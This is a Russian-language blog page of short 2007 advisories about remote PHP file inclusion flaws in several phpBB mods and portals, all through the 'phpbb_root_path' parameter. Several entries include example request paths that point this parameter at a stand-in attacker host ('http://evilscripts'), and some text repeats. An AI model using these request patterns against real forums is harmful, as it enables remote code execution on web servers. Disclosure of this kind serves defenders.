Уязвимость позволяет пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «phpbb_root_path» сценарием includes/functions_nomoketos_rules.php. Пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Источник: xakep.ru
вторник, февраля 27, 2007
Уязвимости phpBB: PHP-инклюдинг в Extreme phpBB
Уязвимость позволяет пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «phpbb_root_path» сценарием includes/functions.php. Пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример: /includes/functions.php?phpbb_root_path=http://evilscripts?
Источник: xakep.ru
Пример: /includes/functions.php?phpbb_root_path=http://evilscripts?
Источник: xakep.ru
пятница, февраля 16, 2007
Уязвимости phpBB: PHP-инклюдинг в phpBB++
Уязвимость позволяет пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "phpbb_root_path" в сценарии includes/functions.php. Пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP.
Источник: securitylab.ru
Уязвимость существует из-за недостаточной обработки входных данных в параметре "phpbb_root_path" в сценарии includes/functions.php. Пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP.
Источник: securitylab.ru
вторник, февраля 06, 2007
Уязвимости phpBB: PHP-инклюдинг в Categories hierarchy phpBB Mod
Уязвимость позволяет пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «phpbb_root_path» сценарием class_template.php. Пользователь пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Веб сервера.
Пример: /includes/class_template.php?phpbb_root_path=http://evilscripts?
Источник: xakep.ru
Пример: /includes/class_template.php?phpbb_root_path=http://evilscripts?
Источник: xakep.ru
понедельник, февраля 05, 2007
Уязвимости phpBB: PHP-инклюдинг в phpbb Tweaked
Уязвимость позволяет пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "phpbb_root_path" в сценарии includes/functions.php. Пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Веб сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP.
Пример: /includes/functions.php?phpbb_root_path=http://evilscripts?
Источник: securitylab.ru
Пример: /includes/functions.php?phpbb_root_path=http://evilscripts?
Источник: securitylab.ru
четверг, февраля 01, 2007
Уязвимости phpBB: PHP-инклюдинг в Cerulean Portal System
Уязвимость позволяет пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «phpbb_root_path» сценарием portal.php. Пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример: /portal/portal.php?phpbb_root_path=http://evilscripts?
Источник: xakep.ru
Пример: /portal/portal.php?phpbb_root_path=http://evilscripts?
Источник: xakep.ru
Подписаться на:
Сообщения (Atom)